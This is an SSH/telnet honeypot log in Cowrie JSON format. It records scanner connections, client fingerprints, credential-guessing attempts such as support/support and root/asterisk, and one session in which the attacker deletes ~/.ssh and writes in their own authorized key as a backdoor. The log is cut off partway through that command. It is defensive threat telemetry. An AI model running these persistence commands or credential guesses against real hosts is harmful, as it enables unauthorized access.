{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59160,"dst_ip":"1.2.3.4","dst_port":22,"session":"29a68839cd94","protocol":"ssh","message":"New connection: 217.72.205.35:59160 (1.2.3.4:22) [session: 29a68839cd94]","sensor":"my-vps","timestamp":"2025-09-08T12:27:32.938330Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:27:32.939625Z","src_ip":"217.72.205.35","session":"29a68839cd94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:27:39.613217Z","src_ip":"79.124.8.120","session":"1592f3cea789"}
{"eventid":"cowrie.session.closed","duration":180.08825540542603,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:27:39.616247Z","src_ip":"79.124.8.120","session":"1592f3cea789"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:28:21.788211Z","src_ip":"212.227.235.229","session":"789abc831fb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56738,"dst_ip":"1.2.3.4","dst_port":23,"session":"f49068274135","protocol":"telnet","message":"New connection: 212.227.125.160:56738 (1.2.3.4:23) [session: f49068274135]","sensor":"my-vps","timestamp":"2025-09-08T12:28:57.111083Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.95.167.162","src_port":11783,"dst_ip":"1.2.3.4","dst_port":22,"session":"573fce319969","protocol":"ssh","message":"New connection: 36.95.167.162:11783 (1.2.3.4:22) [session: 573fce319969]","sensor":"my-vps","timestamp":"2025-09-08T12:29:03.117522Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:03.683599Z","src_ip":"36.95.167.162","session":"573fce319969"}
{"eventid":"cowrie.session.connect","src_ip":"36.95.167.162","src_port":11821,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ff523454659","protocol":"ssh","message":"New connection: 36.95.167.162:11821 (1.2.3.4:22) [session: 1ff523454659]","sensor":"my-vps","timestamp":"2025-09-08T12:29:04.121599Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:05.690694Z","src_ip":"36.95.167.162","session":"1ff523454659"}
{"eventid":"cowrie.session.connect","src_ip":"36.95.167.162","src_port":11895,"dst_ip":"1.2.3.4","dst_port":22,"session":"b792183385a5","protocol":"ssh","message":"New connection: 36.95.167.162:11895 (1.2.3.4:22) [session: b792183385a5]","sensor":"my-vps","timestamp":"2025-09-08T12:29:06.198554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ROSSSH","message":"Remote SSH version: SSH-2.0-ROSSSH","sensor":"my-vps","timestamp":"2025-09-08T12:29:06.645319Z","src_ip":"36.95.167.162","session":"b792183385a5"}
{"eventid":"cowrie.client.kex","hassh":"e7c5793d3b7d9f4dd6bd9e027595e061","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512;aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes1256-ctr;hmac-sha1,hmac-sha2-256,hmac-sha2-512;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512"],"keyAlgs":["ssh-rsa","ssh-dss","rsa-sha2-256","rsa-sha2-512"],"encCS":["aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes1256-ctr"],"macCS":["hmac-sha1","hmac-sha2-256","hmac-sha2-512"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e7c5793d3b7d9f4dd6bd9e027595e061","sensor":"my-vps","timestamp":"2025-09-08T12:29:07.265339Z","src_ip":"36.95.167.162","session":"b792183385a5"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-09-08T12:29:09.050920Z","src_ip":"36.95.167.162","session":"b792183385a5"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:10.782625Z","src_ip":"36.95.167.162","session":"b792183385a5"}
{"eventid":"cowrie.session.closed","duration":30.9258975982666,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:28.036908Z","src_ip":"212.227.125.160","session":"f49068274135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56416,"dst_ip":"1.2.3.4","dst_port":22,"session":"d17e6f3d5ef2","protocol":"ssh","message":"New connection: 212.227.125.160:56416 (1.2.3.4:22) [session: d17e6f3d5ef2]","sensor":"my-vps","timestamp":"2025-09-08T12:29:54.634270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.6.1","message":"Remote SSH version: SSH-2.0-OpenSSH_6.6.1","sensor":"my-vps","timestamp":"2025-09-08T12:29:54.634981Z","src_ip":"212.227.125.160","session":"d17e6f3d5ef2"}
{"eventid":"cowrie.client.kex","hassh":"5445c358120b523b688fb5f70acd1122","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 5445c358120b523b688fb5f70acd1122","sensor":"my-vps","timestamp":"2025-09-08T12:29:54.794291Z","src_ip":"212.227.125.160","session":"d17e6f3d5ef2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56298,"dst_ip":"1.2.3.4","dst_port":22,"session":"753d1e2dcc38","protocol":"ssh","message":"New connection: 212.227.235.229:56298 (1.2.3.4:22) [session: 753d1e2dcc38]","sensor":"my-vps","timestamp":"2025-09-08T12:29:56.916669Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T12:29:56.917522Z","src_ip":"212.227.235.229","session":"753d1e2dcc38"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:56.918142Z","src_ip":"212.227.235.229","session":"753d1e2dcc38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65160,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8d6182e5a1b","protocol":"ssh","message":"New connection: 212.227.235.229:65160 (1.2.3.4:22) [session: e8d6182e5a1b]","sensor":"my-vps","timestamp":"2025-09-08T12:29:57.295982Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003t\\xb0\\x94\\xf9\\xb5\u000b\\x84^\\x9e\\xfaz\u04cb\\xea\\xc0\u0006\\x9bqw)J%c\f\\xc3\\xcf\u0014G\\xd1N\u02e1\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003t\\xb0\\x94\\xf9\\xb5\u000b\\x84^\\x9e\\xfaz\u04cb\\xea\\xc0\u0006\\x9bqw)J%c\f\\xc3\\xcf\u0014G\\xd1N\u02e1\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-08T12:29:57.297930Z","src_ip":"212.227.235.229","session":"e8d6182e5a1b"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:29:57.298787Z","src_ip":"212.227.235.229","session":"e8d6182e5a1b"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:30:02.635247Z","src_ip":"212.227.125.160","session":"d17e6f3d5ef2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41132,"dst_ip":"1.2.3.4","dst_port":23,"session":"9eb53296e788","protocol":"telnet","message":"New connection: 212.227.125.160:41132 (1.2.3.4:23) [session: 9eb53296e788]","sensor":"my-vps","timestamp":"2025-09-08T12:30:40.479430Z"}
{"eventid":"cowrie.session.closed","duration":30.62562084197998,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:31:11.104941Z","src_ip":"212.227.125.160","session":"9eb53296e788"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44836,"dst_ip":"1.2.3.4","dst_port":22,"session":"e22dcf7fe5e4","protocol":"ssh","message":"New connection: 212.227.235.229:44836 (1.2.3.4:22) [session: e22dcf7fe5e4]","sensor":"my-vps","timestamp":"2025-09-08T12:32:45.015116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:32:45.015841Z","src_ip":"212.227.235.229","session":"e22dcf7fe5e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:32:45.146503Z","src_ip":"212.227.235.229","session":"e22dcf7fe5e4"}
{"eventid":"cowrie.login.failed","username":"huser","password":"huser2025","message":"login attempt [huser/huser2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:32:45.708323Z","src_ip":"212.227.235.229","session":"e22dcf7fe5e4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:32:46.840935Z","src_ip":"212.227.235.229","session":"e22dcf7fe5e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32984,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab6d6593c887","protocol":"ssh","message":"New connection: 212.227.235.229:32984 (1.2.3.4:22) [session: ab6d6593c887]","sensor":"my-vps","timestamp":"2025-09-08T12:33:06.589658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:33:06.590779Z","src_ip":"212.227.235.229","session":"ab6d6593c887"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:33:06.887816Z","src_ip":"212.227.235.229","session":"ab6d6593c887"}
{"eventid":"cowrie.login.failed","username":"huser","password":"huser2025","message":"login attempt [huser/huser2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:33:08.083674Z","src_ip":"212.227.235.229","session":"ab6d6593c887"}
{"eventid":"cowrie.session.connect","src_ip":"45.33.14.5","src_port":60801,"dst_ip":"1.2.3.4","dst_port":22,"session":"5957cb0514fe","protocol":"ssh","message":"New connection: 45.33.14.5:60801 (1.2.3.4:22) [session: 5957cb0514fe]","sensor":"my-vps","timestamp":"2025-09-08T12:33:09.312813Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:09.386703Z","src_ip":"212.227.235.229","session":"ab6d6593c887"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:09.470836Z","src_ip":"45.33.14.5","session":"5957cb0514fe"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":10708,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0961cb54024","protocol":"ssh","message":"New connection: 172.105.128.11:10708 (1.2.3.4:22) [session: d0961cb54024]","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.383078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.384075Z","src_ip":"172.105.128.11","session":"d0961cb54024"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.476056Z","src_ip":"172.105.128.11","session":"d0961cb54024"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.569545Z","src_ip":"172.105.128.11","session":"d0961cb54024"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":10716,"dst_ip":"1.2.3.4","dst_port":22,"session":"11cdbdd40030","protocol":"ssh","message":"New connection: 172.105.128.11:10716 (1.2.3.4:22) [session: 11cdbdd40030]","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.660060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.660987Z","src_ip":"172.105.128.11","session":"11cdbdd40030"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.752346Z","src_ip":"172.105.128.11","session":"11cdbdd40030"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.846040Z","src_ip":"172.105.128.11","session":"11cdbdd40030"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.128.11","src_port":10720,"dst_ip":"1.2.3.4","dst_port":22,"session":"522103f1ffc9","protocol":"ssh","message":"New connection: 172.105.128.11:10720 (1.2.3.4:22) [session: 522103f1ffc9]","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.952762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:33:10.953695Z","src_ip":"172.105.128.11","session":"522103f1ffc9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:33:11.061590Z","src_ip":"172.105.128.11","session":"522103f1ffc9"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:11.170506Z","src_ip":"172.105.128.11","session":"522103f1ffc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49280,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3db2ed5213f","protocol":"ssh","message":"New connection: 212.227.235.229:49280 (1.2.3.4:22) [session: d3db2ed5213f]","sensor":"my-vps","timestamp":"2025-09-08T12:33:51.380169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:33:51.486224Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:33:52.122469Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.login.success","username":"root","password":"asterisk","message":"login attempt [root/asterisk] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:33:54.511549Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:33:55.550770Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:33:55.551670Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:33:55.552981Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:33:56.158409Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:33:57.426995Z","src_ip":"212.227.235.229","session":"d3db2ed5213f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 